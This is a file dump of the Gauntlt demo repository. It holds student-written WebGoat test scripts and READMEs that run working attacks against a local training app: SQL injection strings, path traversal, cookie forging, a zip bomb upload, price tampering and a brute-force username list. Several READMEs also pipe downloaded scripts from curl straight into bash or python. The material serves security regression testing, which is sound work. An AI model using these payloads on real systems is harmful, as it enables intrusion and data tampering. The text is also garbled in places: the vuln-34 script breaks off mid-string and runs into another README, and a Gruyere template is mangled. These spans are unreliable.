/examples/webgoat/vuln-18/Readme:
--------------------------------------------------------------------------------
1 | TEST vuln-33.attack
2 |
3 | This is a Gauntlt test to check if the vulnerability in WebGoat located at Injection Flaws => Modify Data with SQL Injection exists.
4 |
5 | It will return a
6 |
7 | - test failed if the vulnerability is present
8 | - test successful if the vulnerability is fixed (aka not present)
9 |
10 | This test assumes 2 things:
11 |
12 | 1) That a version of python3 is installed on the computer with compatibility for the requests library. Python3 can be installed with the following command.
13 |
14 | $ sudo apt-get install python3
15 |
16 | This may or may not require an update of the python pip software.
17 |
18 | 2) The script ./webgoat/vuln-33/vuln-33-runner is in the path aka $PATH This can be done and confirmed with:
19 |
20 | $ sudo cp webgoat/vuln-33/vuln-33-runner /usr/bin/
21 | $ sudo chmod 775 /usr/bin/vuln-33-runner
22 | $ which vuln-33-runner
23 | /usr/bin/vuln-33-runner
24 |
25 | Testing this vulnerability can be done outside of Gauntlt by navigating to the webgoat/modifySQL directory and running
26 |
27 | $ ./exploit-vuln-33.bash
28 |
29 | This Gauntlt test was written by Martin Estes and Animesh Gandhi on Fri, 11 Dec 2015
30 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-29/vuln-29.py:
--------------------------------------------------------------------------------
1 | import argparse
2 | import re
3 | import json
4 | import sys
5 | import requests
6 |
7 | login_credentials={
8 | 'username': 'guest',
9 | 'password': 'guest'
10 | }
11 | attack_fields={
12 | 'gId': 'Gmail id',
13 | 'gPass': 'password',
14 | 'subject' : 'Comment for Webgoat',
15 | 'to': 'bill.gates@microsoft.com',
16 | 'msg': ''
17 |
18 | }
19 |
20 | current_session = requests.session()
21 | home= current_session.get("http://127.0.0.1:8080/WebGoat/login.mvc")
22 | login= current_session.post('http://127.0.0.1:8080/WebGoat/j_spring_security_check',login_credentials)
23 | login= current_session.get("http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc")
24 |
25 | our_site_link = json.loads(login.text)[16].get('children')[2].get('link')
26 | vuln29_menu_page="http://127.0.0.1:8080/WebGoat/"+our_site_link
27 |
28 | attack_page= current_session.get(vuln29_menu_page)
29 | attack_page= current_session.post(vuln29_menu_page, attack_fields)
30 |
31 | if attack_page.text.find('Congratulations. You have successfully completed this lesson'):
32 | print "Vulnerability Found"
33 | else:
34 | print "No vulnerability present"
35 |
36 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-01/attack2.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import json
3 |
4 | s = requests.Session();
5 | payload = {'password': 'guest', 'username': 'guest'}
6 | r = s.post("http://127.0.0.1:8080/WebGoat/j_spring_security_check", data=payload)
7 | ##Used s to maintain session without having to keep track of or modify cookies
8 |
9 | ##Accessed lesson menu first to find address of menu item we need since it is dynamically generated
10 | r = s.get("http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc")
11 | resp_dict = json.loads(r.text)
12 | list1 = resp_dict[2]['children']
13 | link = list1[1]['link']
14 |
15 | ##Crafted the link, then retrieved the page
16 | str = 'http://127.0.0.1:8080/WebGoat/' + link
17 | r = s.get(str)
18 |
19 | ##At the page with vulnerability now
20 | ##Request an item not on the list of files given on this page
21 | req = {'SUBMIT': 'View+File', 'File': '../../main.jsp'}
22 | r = s.post(str, data=req)
23 |
24 | ##Used the in function to scan http response for the text confirming exploit worked.
25 | results = "Congratulations! Access to file allowed" in r.text
26 | if results:
27 | print("Attack Successful")
28 | else:
29 | print("Attack Failed, Vulnerability Not Present")
30 |
--------------------------------------------------------------------------------
/vendor/gruyere/README.md:
--------------------------------------------------------------------------------
1 | # The Gruyere Target
2 | Gruyere is a Codelab by Bruce Leban, Mugdha Bendre, and Parisa Tabriz. Gauntlt vendors it here to have a target to run gauntlt attacks against. We assume no responsibility for the code and we are not distributing the code in a modified form.
3 |
4 | It is a vulnerable app and should not be copied or modified.
5 |
6 | ## Using Gruyere as a Target
7 | We use Gruyere as a target to make sure gauntlt works as expected. We use the `service_manager` gem to handle starting it up before our cucumber tests run and then shut it down at the end. In here are also two files prefixed with `manual_` and those are if you want to run Gruyere byhand.
8 |
9 | ## To run Gruyere by hand
10 | ```
11 | $ ./manual_launch.sh
12 | ```
13 | You should now be able to go to http://localhost:8008 and use the Gruyere application and target it.
14 |
15 | ## To stop Gruyere
16 | The kill just looks at the `gruyere.pid` and kills that process.
17 | ```
18 | $ ./manual_kill.sh
19 | ```
20 | That's it. You can make sure that it isnt running `ps -ef | grep python` in case you are worried.
21 |
22 | ## For more details on Gruyere
23 | For more details, please see http://google-gruyere.appspot.com/
24 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-01/README.md:
--------------------------------------------------------------------------------
1 | TEST Vulnerability 01- Bypassing an Path Based Access Control System
2 |
3 | This is a Gauntlt test to see if a vulnerability is present in the Access Control Flaws->Bypass a Path Based Access Control Scheme page of the Webgoat App.
4 |
5 | It will return an error and "Attack Successful" if the vulnerability is present and "Attack Failed, Vulnerability Not Present" if the vulnerability is not present or has been fixed.
6 |
7 | This test assumes three things, that:
8 |
9 | - The gauntlt-demo repo was cloned to /home/hacker/ with
10 | ```
11 | $ git clone https://github.com/gauntlt/gauntlt-demo.git
12 | ```
13 | from /home/hacker/
14 |
15 | - That gauntlt is placed in the path using
16 | ```
17 | $ source .rvm/scripts/rvm
18 | ```
19 | from /home/hacker/ as well.
20 |
21 | - That pip and the python Requests library are installed, by running the following in Terminal as root:
22 | ```
23 | $ apt-get install python-pip
24 | $ pip install requests
25 | ```
26 |
27 | This individual test can be run by executing gauntlt in this directory rather than the gauntlt-demo parent directory.
28 |
29 |
30 | This Gauntlt test was written by Connor Mooney and Daniel Zhang on December 8th, 2015
31 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-13/README.md:
--------------------------------------------------------------------------------
1 | Hunter DeGroot and Zack Bilderback
2 |
3 | TEST vuln-13.attack
4 |
5 | This is a Gauntlt test to check if the vulnerability in WebGoat located at Injection Flaws => Log Spoofing (vuln-13) exists.
6 |
7 | It will return a
8 | - 1 (error) if the vulnerability is present
9 | - 0 (success) if the vulnerability is fixed (aka not present)
10 |
11 | This test assumes 3 things:
12 |
13 | (jerry-curl maybe not required)
14 | (1) That jerry-curl and jq are installed and available on the $PATH and uses the generic command-line attack. To install these run the following command on Debian-based systems aka those using .deb packages.
15 |
16 | ```
17 | $ sudo apt-get install owasp-wte-jerry-curl owasp-wte-jq
18 | ```
19 |
20 | This assumes you have the OWASP WTE repo setup on the computer running Gauntlt. If not, it can be added with:
21 |
22 | ```
23 | $ sudo echo "deb http://appseclive.org/apt/14.04 trusty main" > /etc/apt/sources.list.d/owasp-wte.list
24 | $ sudo wget -q -O - http://appseclive.org/apt/owasp-wte.gpg.key | apt-key add -
25 | ```
26 |
27 | (2) There is a local proxy running on 127.0.0.1:8888
28 |
29 | (3) Have python requests
30 |
31 | apt-get install python-pip
32 |
33 | pip install requests
34 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-19/attack.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import json
3 | import sys
4 |
5 | base_url = "http://127.0.0.1:8080/WebGoat/"
6 |
7 | #Creates a new session, logs into the server.
8 | sess = requests.Session()
9 | login = {'username': 'guest', 'password': 'guest'}
10 | resp = sess.post(base_url + "j_spring_security_check", data=login)
11 |
12 | resp = sess.get(base_url + "service/lessonmenu.mvc")
13 | directory = json.loads(resp.text)
14 | #Gets the url of our target page from the directory sidebar
15 | target_uri = directory[10]['children'][7]['link']
16 | target_url = base_url + target_uri
17 |
18 | #Gets the target page
19 | resp = sess.get(target_url)
20 |
21 | #Forming the malicious response
22 | mal_data = {"userid": "jsmith'; INSERT INTO salaries VALUES ('test',9999);--", "SUBMIT": "Go!"}
23 | sess.post(target_url, data=mal_data)
24 |
25 | #If attack was successful, we should then be able to request the inserted data
26 | req_mal_data = {"userid": "test", "SUBMIT": "Go!"}
27 | resp = sess.post(target_url, data=req_mal_data)
28 |
29 | if 'test' in resp.text and '9999' in resp.text:
30 | print("Site is vulnerable to SQL Data Injection")
31 | print("Vulnerability test 19 failed.")
32 | sys.exit(1)
33 | else:
34 | sys.exit(0)
35 |
36 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-10/README.md:
--------------------------------------------------------------------------------
1 | TEST vuln-10.attack
2 |
3 | This is a Gauntlt test to check if the vulnerability in WebGoat located at Improper Error Handling => Fail Open Authentication Scheme (vuln-10) exists. You can run the specific attack file by switching to /home/hacker/Desktop/gauntlt-demo/examples/webgoat/vuln-10/ and running gauntlt in the directory.
4 |
5 | It will return a
6 | - 1 and print "Attack Successful" if the vulnerability is present
7 | - 0 and print "vuln-10 not present" if the vulnerability is fixed (aka not present)
8 |
9 | This test assumes 3 things:
10 | (1) Requests for python is installed (can be done using pip).
11 |
12 | you can do this in the Hacking vm with the following commands:
13 |
14 | $ curl https://raw.githubusercontent.com/pypa/pip/master/contrib/get-pip.py | python
15 | $ pip install requests
16 |
17 | (2) gauntlt-demo is cloned to the desktop so that the directories line up to the attack script
18 |
19 | The attack script assumes the exploit python file is saved in the following directory:
20 | /home/hacker/Desktop/gauntlt-demo/examples/webgoat/vuln-10/exploit-vuln-10.py
21 |
22 | (3) Webgoat is up and running
23 |
24 | This can be done using the following command:
25 |
26 | $ webgoat start
27 |
28 |
29 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-23/exploit-vuln-23.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import sys
3 | import json
4 |
5 | URL = 'http://127.0.0.1:8080/WebGoat/j_spring_security_check'
6 |
7 | def main():
8 | # Start a session so we can have persistant cookies
9 | session = requests.session()
10 |
11 | # This is the form data that the page sends when logging in
12 | login_data = {
13 | 'username': 'guest',
14 | 'password': 'guest',
15 | }
16 |
17 | # Authenticate
18 | r = session.post(URL, data=login_data)
19 |
20 | # get JSON object
21 | r = session.get('http://127.0.0.1:8080/WebGoat/attack?Screen=32&menu=5')
22 | j = session.get('http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc')
23 | jobj = j.json()
24 |
25 | # create URL from correct screen and menu variables
26 | st = jobj[11][u'children'][0][u'link']
27 | zipurl = 'http://127.0.0.1:8080/WebGoat/' + st
28 |
29 | #uploading the zip bomb
30 | fileobj = open('/home/hacker/gauntlt-demo/examples/webgoat/vuln-23/zipBomb.zip', 'rb')
31 | r = session.post(zipurl, files = {"zipBomb.zip": fileobj})
32 |
33 | #print the html code to check if the key phrase is in it
34 | print(r.text)
35 |
36 | if __name__ == '__main__':
37 | main()
38 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-29/readme.md:
--------------------------------------------------------------------------------
1 | # TEST vuln-29.attack
2 | This is a Gauntlt test to check if the vulnerability in WebGoat located at General => Http Basics (vuln-29) exists.
3 |
4 | It will return a
5 |
6 | 1 (Vulnerability present) if the vulnerability is present
7 | 0 (No Vulnerability present) if the vulnerability is fixed
8 |
9 | This test assumes 3 things:
10 |
11 |
12 | (1)The script ./webgoat/vuln-29/vuln-29.py is in the path aka $PATH This can be done & confirmed with:
13 | ```
14 | $ sudo cp webgoat/vuln-29/vuln-29.py /usr/bin/
15 | $ sudo chmod 775 /usr/bin/vuln-29.py
16 | $ which vuln-29.py
17 | /usr/bin/vuln-29.py
18 | ```
19 |
20 | (2)Pip needs to be installed. If not installed, it can be done with the following command
21 |
22 | ```
23 | curl https://raw.githubusercontent.com/pypa/pip/master/contrib/get-pip.py | python
24 | ```
25 | Once pip is installed, install the requests,which are necessary for the script to run
26 | ```
27 | pip install requests
28 | ```
29 |
30 |
31 | (3) The gauntlt-demo repo is cloned in home/hacker/ directory. Vuln-29.py works if folder
32 | is moved to external location home/hacker/test-gauntlt. Gauntlt needs to be called from
33 | here.
34 |
35 | This Gauntlt test was written by Juan Villegas and Hannah Grounds on Thurs, 10 Dec 2015
--------------------------------------------------------------------------------
/examples/webgoat/vuln-05/readme.md:
--------------------------------------------------------------------------------
1 | Report by Alexandra Martinez and Jacob Walsh
2 |
3 | UT CS 361 Fall 2015
4 |
5 | Team: cs361_team
6 |
7 | Phishing login credentials by XSS
8 |
9 |
10 | Changes to Hacking Lab VM needed for testing:
11 |
12 |
13 | $ sudo apt-get install python3
14 |
15 | $ sudo apt-get install python3-requests
16 |
17 |
18 | The attack assumes the python file, attack05.py, is in directory
19 |
20 | ~/casestudy/gauntlt-demo/examples/webgoat/vuln-05/
21 |
22 |
23 |
24 |
25 | and the script vuln-05-runner is in the path
26 |
27 | This can be confirmed with:
28 |
29 | $ sudo cp casestudy/gauntlt-demo/examples/webgoat/vuln-05/vuln-05-runner /usr/bin/
30 |
31 | $ sudo chmod 775 /usr/bin/vuln-05-runner
32 |
33 | $ which vuln-05-runner
34 |
35 | /usr/bin/vuln-05-runner
36 |
37 |
38 |
39 |
40 |
41 |
42 | Gauntlt will call the vuln-05-runner script which in turn will run our python attack.
43 |
44 | Goal of Attack
45 | This attack takes advantage of a Cross-Site Scripting (XSS) vulnerability
46 | where we generate a fake login page. This page is set to phish the login credentials
47 | that are entered and sent to a location of our choice. Our attack preforms this injection,
48 | submits credentials and utilizes webgoats system to confirm that the attack worked.
49 |
50 |
51 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-16/vuln-16.py:
--------------------------------------------------------------------------------
1 | import requests
2 |
3 | s = requests.Session()
4 |
5 | r = s.post("http://localhost:8080/WebGoat/j_spring_security_check", data={"username": "webgoat", "password": "webgoat"})
6 |
7 | #print r.headers
8 | #print r.text
9 | #print r
10 | #print r.cookies
11 | #print s.cookies
12 |
13 | #print s.get("http://localhost:8080/WebGoat/").text
14 |
15 | inject = None
16 |
17 | for high in s.get("http://localhost:8080/WebGoat/service/lessonmenu.mvc").json():
18 | if high['name'] == "Injection Flaws":
19 | inject = high
20 | break
21 | #print high
22 | # print high['name']
23 |
24 | blah = None
25 |
26 | for next in inject['children']:
27 | #print next
28 | if next['name'] == "LAB: SQL Injection":
29 | blah = next
30 |
31 | #print blah
32 |
33 | #print inject
34 |
35 | attack_loc = blah['link'] + "&stage=3"
36 |
37 | #print attack_loc
38 |
39 | s.get("http://localhost:8080/WebGoat/{}".format(attack_loc))
40 | r2 = s.post("http://localhost:8080/WebGoat/{}".format(attack_loc), data={"employee_id": 112, "password": "smith' OR '1' = '1", "action": "Login"}, cookies = r.cookies)
41 |
42 | #print r2
43 |
44 | #print r2.text
45 |
46 | if "Welcome Back" in r2.text and "Neville" in r2.text:
47 | print "FAIL"
48 | else:
49 | print "PASS"
50 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-35/practice.py:
--------------------------------------------------------------------------------
1 | import requests
2 |
3 | #url for logging in
4 |
5 | url = 'http://127.0.0.1:8080/WebGoat/j_spring_security_check'
6 |
7 | # the session instance for get/post use.
8 |
9 | login_payload = {'username':'guest','password':'guest'}
10 | session = requests.Session()
11 | response = session.post(url,data=login_payload)
12 |
13 | #access menu
14 | #if response.status_code==200:
15 | menu = session.get('http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc')
16 | #find our lesson
17 | attack_start = menu.text.find('Using an Access Control Matrix')
18 | #find the param section
19 | post_attack = menu.text.find('Screen', attack_start)
20 | #get user's specific session params
21 | params = menu.text[post_attack: post_attack + 21]
22 | #use those params for their specific url
23 | new_url = 'http://127.0.0.1:8080/WebGoat/attack?' + params
24 | #create the vulnerable payload. Larry should not be allowed account manager priviliges
25 | payload = {'User':'Larry','Resource':'Account Manager','SUBMIT':'Check Access'}
26 | #post with the payload
27 | response = session.post(new_url, data=payload)
28 |
29 | #print(response.text)
30 | vulnerable="Congratulations" in response.text
31 |
32 | if vulnerable:
33 | print 'vulnerability exists'
34 | else:
35 | print 'vulnerability does not exists'
36 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-00/jerry-curl-04.config:
--------------------------------------------------------------------------------
1 | # Some examples of items to put in this config file
2 | #
3 | # For repeated requests to the same URL:
4 | BASE=http://127.0.0.1:8080/WebGoat
5 | # NOTE: BASE is the only config option done as a key=value pair.
6 | # All others are simply one command line option per line.
7 | # Make sure the line starts with "BASE="
8 | #
9 | # NOTE: DO NOT QUOTE ARGUMENTS TO COMMAND LINE OPTIONS
10 | # jerry-curl will automagically quote them for you
11 | #
12 | # Proxy curl commands:
13 | --proxy 127.0.0.1:8888
14 | #
15 | # Allow insecure SSL:
16 | # --insecure
17 | #
18 | # Include headers in the output
19 | -include
20 | #
21 |
22 | # Set headers like IceWeasel for the exploit of General => Http Basics page
23 | # by POSTing to /attack?$MENU where $MENU is something like "Screen=1094&menu=100"
24 | -X POST
25 | --data person=Eddie+Example&SUBMIT=Go!
26 | -A Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.0
27 | -H Accept: */*
28 | -H Accept-Language: en-US,en;q=0.5
29 | -H Content-Type: application/x-www-form-urlencoded; charset=UTF-8
30 | -H X-Requested-With: XMLHttpRequest
31 | -H Referer: http://127.0.0.1:8080/WebGoat/start.mvc
32 | -H Connection: keep-alive
33 | -H Pragma: no-cache
34 | -H Cache-Control: no-cache
35 |
36 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-43/README.md:
--------------------------------------------------------------------------------
1 | TEST vuln-43.attack
2 |
3 | This is a Gauntlt test to check if the vulnerability in WebGoat located at Concurrency => Shopping Cart Concurrency Flaw (vuln-43) exists.
4 |
5 | It will return a
6 | - 1 (error) if the vulnerability is present, or if an error occurred trying to access it
7 | - 0 (success) if the vulnerability is fixed (aka not present)
8 |
9 | This test assumes:
10 |
11 | (1) That Python and the "requests" module are installed. "requests" can be installed with ```pip install requests```. If pip is not installed, use ```curl https://raw.githubusercontent.com/pypa/pip/master/contrib/get-pip.py | python``` to install it.
12 |
13 | (2) The script webgoat/vuln-43/vuln-43-runner is in the path ($PATH) and executable. This can be done with the following commands, which must be run from the vuln-43 directory, as the files' owner:
14 |
15 | ```
16 | $ export PATH=$PATH:`pwd`
17 | $ chmod 755 vuln-43-runner
18 | ```
19 |
20 | (3) WebGoat is running on http://127.0.0.1:8080/WebGoat/
21 |
22 |
23 | Testing vuln-43 can be done outside of Gauntlt by navigating to the webgoat/vuln-43 directory and running:
24 |
25 | ```
26 | $ chmod 755 vuln-43-runner
27 | $ ./vuln-43-runner
28 | ```
29 |
30 | This Gauntlt test was written by Sam Lauber and Mukund Rathi on Monday December 7 2015
31 |
32 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-38/usernames.txt:
--------------------------------------------------------------------------------
1 | 123
2 | 123456
3 | PlcmSpIp
4 | Test
5 | a
6 | adm
7 | admin
8 | administrator
9 | alejandro
10 | apache
11 | apache2
12 | backup
13 | bin
14 | bitrix
15 | boletos
16 | boot
17 | cacti
18 | cisco
19 | cmsftp
20 | dasusr1
21 | db2inst1
22 | demo
23 | deploy
24 | desarrollo
25 | dff
26 | dspace
27 | eric
28 | fmaster
29 | ftp
30 | ftpadmin
31 | ftptest
32 | ftpuser
33 | gerencia
34 | gerente
35 | git
36 | globalflash
37 | guest
38 | hadoop
39 | horarios
40 | httpd
41 | info
42 | java
43 | jboss
44 | jenkins
45 | juegos
46 | martin
47 | minecraft
48 | mysql
49 | nagios
50 | newadmin
51 | nginx
52 | nobody
53 | odoo
54 | oracle
55 | phpmy
56 | pi
57 | postgres
58 | r00t
59 | recruit
60 | recursos
61 | recursosh
62 | reloj
63 | rodrigo
64 | root
65 | salon
66 | server
67 | servicios
68 | servicos
69 | servidor
70 | squid
71 | sshd
72 | student
73 | support
74 | svn
75 | sysadmin
76 | teamspeak
77 | teamspeak3
78 | test
79 | testuser
80 | tomcat
81 | ts
82 | ts3
83 | ubnt
84 | ubuntu
85 | user
86 | vagrant
87 | victor
88 | vnc
89 | wangyi
90 | web
91 | webadmin
92 | weblogic
93 | webmaster
94 | www
95 | www-data
96 | xyz
97 | zabbix
98 | zhangyan
99 | zhaowei
100 | zxin10
101 | jeff
102 | dave
103 | intern
104 | webgoat
105 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-36/vuln-36.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import json
3 |
4 | session = requests.session()
5 |
6 | # Load initial login screen
7 | session.get("http://127.0.0.1:8080/WebGoat")
8 | # Data used for login
9 | data = {'username': 'guest', 'password' : 'guest'}
10 | # Logging in using the cookie given to us and the data credientials
11 | session.post("http://127.0.0.1:8080/WebGoat/j_spring_security_check;jsessionid=" + str(session.cookies),data)
12 | # Loading the dynamic lesson menu
13 | request = session.get("http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc")
14 | # Parse the dynamic lesson menu's response to get only the names of the lessons and their
15 | # corresponding dynamic values pairs.
16 | splitMenu = str(request.text).split("},{")
17 | for i in splitMenu:
18 | # Looking for the name of our vuln. in the lesson menu's JSON response
19 | if "XML Injection" in i:
20 | split_injection = i.split(",")
21 | URL = split_injection[4].split("\"")
22 |
23 | # The XML data that we are going to inject into the application
24 | data = {'accountID':'836239','check1004':'on','check1005':'on','SUBMIT':'Submit'}
25 | # The POST resquest that uses malicious XML data to get more airline rewards than we should be
26 | # able to get.
27 | request = session.post("http://127.0.0.1:8080/WebGoat/" + URL[3], data)
28 | print request.text
29 |
30 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-34/exploit-vuln34.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import sys
3 | import json
4 | import re
5 |
6 | #url inits
7 | base_url = "http://127.0.0.1:8080/WebGoat/"
8 | login_url = base_url + 'login.mvc'
9 | post_url = base_url + 'j_spring_security_check'
10 | menu_url = base_url + 'service/lessonmenu.mvc'
11 |
12 | #success string
13 | success = 'Congratulations. You have successfully completed this lesson'
14 |
15 | #session data
16 | login_data = {'username': 'webgoat','password': 'webgoat'}
17 | attack_string = {'password': 'hacked21 | 2) There is a local proxy running on 127.0.0.1:8888 22 | Testing vuln-31 can be done outside of Gauntlt by navigating to the webgoat/vuln-31 directory and running: 23 | 24 | $ python exploit-vuln-31.py 25 | 26 |
27 | 3) Create a new directory called CaseStudyVuln31 and clone the gauntlt repo in that directory. The path to the script is like so. Running Guantlt will be safest if you are cd into this directory. 28 | 29 | /home/hacker/CaseStudyVuln31/gauntlt-demo/examples/webgoat/vuln-31/exploit-vuln-31.py 30 | 31 | 32 |
33 | *This Gauntlt test was written by Tin Vo (tinnvo1101@gmail.com) and Uyviet Nguyen (uyviet.nguyen@utexas.edu) on 10 Dec 2015* 34 | -------------------------------------------------------------------------------- /vendor/gruyere/source/resources/showprofile.gtl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
12 |
15 |
16 | [[if:_message]]
17 |
18 | [[/if:_message]]
19 |
20 | Gruyere: Profile
13 |Add a new account or edit an existing account.
14 |
21 |
55 |
56 |
57 |
58 |
59 |
60 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-22/README.md:
--------------------------------------------------------------------------------
1 | Vuln-22 Blind String SQL Injection
2 |
3 | Install WebGoat and Gauntlt through a root terminal using the command:
4 |
5 | curl -sSL http://bit.ly/1MJ3qNp | bash
6 |
7 | Next check to see that Gauntlt installed without problems by opening a normal terminal and running these three commands in succession from the home directory:
8 |
9 | which gauntlt
10 | source .rvm/scripts/rvm
11 | which gauntlt
12 |
13 | This is done in the home directory because this ensures that the rvm script will always be in the path of the python script and attack file.
14 |
15 | In order to run the python script, parse.py, correctly, it is necessary to download the pip package management system because the python requests library is used for the .Session(), .get, and .post functions. To install pip on the virtual machine using a root terminal, use the command:
16 |
17 | python get-pip.py
18 |
19 | Then to install the requests library, use the command:
20 |
21 | pip install requests
22 |
23 | From here, given that the WebGoat application is up and running, the python script should run with the simple command:
24 |
25 | python parse.py
26 |
27 | In order to run the python script in conjunction with the attack file, Vuln-22.attack, the absolute path of the python script must be included, or else gaunlt will not be able to find the script.
28 |
29 | Finally, in order to run the python script and attack file together, input, in a normal terminal, the command:
30 |
31 | gauntlt Vuln-22.attack
32 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-31/exploit-vuln-31.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import json
3 | from requests.auth import HTTPBasicAuth
4 |
5 | with requests.Session() as c:
6 | # URLs from the WebGoat
7 | url_1 = 'http://127.0.0.1:8080/WebGoat/attack?Screen=74&menu=1800'
8 | url_2 = 'http://127.0.0.1:8080/WebGoat/j_spring_security_check'
9 |
10 | # Get session_1 (or cookie_1)
11 | c.get(url_1)
12 | session_1 = c.cookies.items()[0][1]
13 |
14 | # Get session_2 (or cookie_2)
15 | login_data = {'username':'webgoat', 'password':'webgoat'}
16 | cookie = {'JSESSIONID': session_1}
17 | c.post(url_2, login_data, cookies = cookie)
18 | session_2 = c.cookies.items()[0][1]
19 |
20 | # Get the link
21 | url_3 = 'http://127.0.0.1:8080/WebGoat/attack?Screen=170&menu=100'
22 | url_4 = 'http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc'
23 | c.get(url_3)
24 | req = c.get(url_4)
25 | parsed_json = json.loads(req.text)
26 | link = 'http://127.0.0.1:8080/WebGoat/'
27 | link += parsed_json[17]["children"][1]["link"]
28 |
29 | # Attack
30 | username = "alice"
31 | reverse_username = username[::-1]
32 | auth_cookie = "65432"
33 | for letter in reverse_username:
34 | auth_cookie += chr(ord(letter) + 1)
35 |
36 | #cookie['AuthCookie'] = '65432fdjmb'
37 | cookie['AuthCookie'] = auth_cookie
38 | req = c.get(link, cookies = cookie)
39 |
40 | # Parse req to find alice
41 | if "Welcome, alice" in req.content:
42 | print ("***Vulnerability Present***")
43 | else:
44 | print ("***No Vulnerability***")
45 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-19/README.md:
--------------------------------------------------------------------------------
1 | TEST vuln-19.attack
2 |
3 | This is a Gauntlt test to check if the vulnerability in WebGoat located at Injection Flaws => Add Data with SQL Injection exists.
4 |
5 | It will return a
6 | 1 (error) if the vulnerability is present
7 | 0 (success) if the vulnerability is fixed (aka not present)
8 |
9 | This test assumes 3 things:
10 |
11 | (1) First, it assumes that the path of the WebGoat vulnerabilities to be tested is:
12 | ```
13 | /home/hacker/gauntlt-demo/examples/webgoat/
14 | ```
15 | This should be true if the gauntlt demo directory was created by cloning the
16 | repo off of github into the home directory of the hacking-lab VM.
17 |
18 | (2) Second, it assumes that the Python package manager pip, and the Python module "Requests" are both
19 | installed on the running machine.
20 | If these are not, then they can be installed by running the following two commands on a Debian distro:
21 | ```
22 | $ sudo apt-get install python-pip
23 | $ sudo pip install requests
24 | ```
25 | (3) Third, this test assumes that WebGoat is setup and running on localhost:8080, equivalent to 127.0.0.1:8080.
26 |
27 | Testing this vulnerability can be done outside of Gauntlt by navigating to the webgoat/vuln-19 directory and running
28 | ```
29 | $ python attack.py
30 | ```
31 |
32 | If executed this way and the script returns silently, then there is no vulnerability. Otherwise, it will output
33 | that there exists a vulnerability.
34 |
35 | This attack script written by Barry Luther, EID: BBL345
36 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-39/vuln-39.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import json
3 | loginurl = 'http://127.0.0.1:8080/WebGoat/login.mvc'
4 | authurl = 'http://127.0.0.1:8080/WebGoat/j_spring_security_check'
5 | menuurl = 'http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc'
6 | attackurl = 'http://127.0.0.1:8080/WebGoat/'
7 | login = {"username":"guest", "password":"guest"}
8 | #modified post. Allows a grand total of $0.00
9 | purchase = {"PRC1":"%240.00", "QTY1":"11", "TOT1":"%240.00", "PRC2":"%240.00", "QTY2":"1", "TOT2":"%240.00", "PRC3":"240.00", "QTY3":"1", "TOT3":"%240.00", "PRC4":"%240.00", "QTY4":"1", "TOT4":"%240.00", "SUBTOT":"%240.00", "GRANDTOT":"%240.00","field2":"4128+3214+0002+1999", "field1":"rgrsehreh", "SUBMIT":"Purchase"}
10 |
11 | # *** Authenticating into WebGoat ***
12 | session = requests.Session()
13 | first = session.get(loginurl)
14 | second = session.post(authurl, login)
15 | third = session.get(menuurl)
16 |
17 | # *** Finding Attack Page ***
18 | for entry in range(len(third.json())):
19 | if third.json()[entry]['name'] == "AJAX Security":
20 | for child in range(len(third.json()[entry]['children'])):
21 | if third.json()[entry]['children'][child]['name'] == "Insecure Client Storage":
22 | attackurl += third.json()[entry]['children'][child]['link']
23 |
24 | fourth = session.get(attackurl)
25 |
26 | # *** POST request with Grand Total = $0.00 ***
27 | fifth = session.post(attackurl, purchase)
28 | if fifth.status_code == 200:
29 | print "Vulnerable"
30 | else:
31 | print "No Vulnerability"
32 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-30/exploit-vuln-30.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import json
3 |
4 | payload = {
5 | 'username': 'guest',
6 | 'password': 'guest'
7 | }
8 |
9 | attack_payload = {
10 | 'field1': 'abc@',
11 | 'field2': '123@',
12 | 'field3': 'abc+123+ABC@',
13 | 'field4': 'seven@',
14 | 'field5': '90210@',
15 | 'field6': '90210-1111@',
16 | 'field7': '301-604-4882@'
17 | }
18 |
19 | login_url = 'http://127.0.0.1:8080/WebGoat/login.mvc'
20 | post_url = 'http://127.0.0.1:8080/WebGoat/j_spring_security_check'
21 |
22 | session = requests.Session()
23 |
24 | login_page = session.get(login_url)
25 | logging = session.post(post_url, data=payload)
26 |
27 | if logging.status_code == 200 :
28 |
29 | menu_url = 'http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc'
30 | menu = session.get(menu_url)
31 | parse_menu = menu.json()
32 |
33 | attack = 'Bypass Client Side JavaScript Validation'
34 | attack_start = menu.text.find(attack)
35 | attack_after_screen = menu.text.find('Screen', attack_start)
36 | screen_menu = menu.text[attack_after_screen: attack_after_screen + 21]
37 | attack_url = 'http://127.0.0.1:8080/WebGoat/attack?' + screen_menu
38 | attack_page = session.get(attack_url)
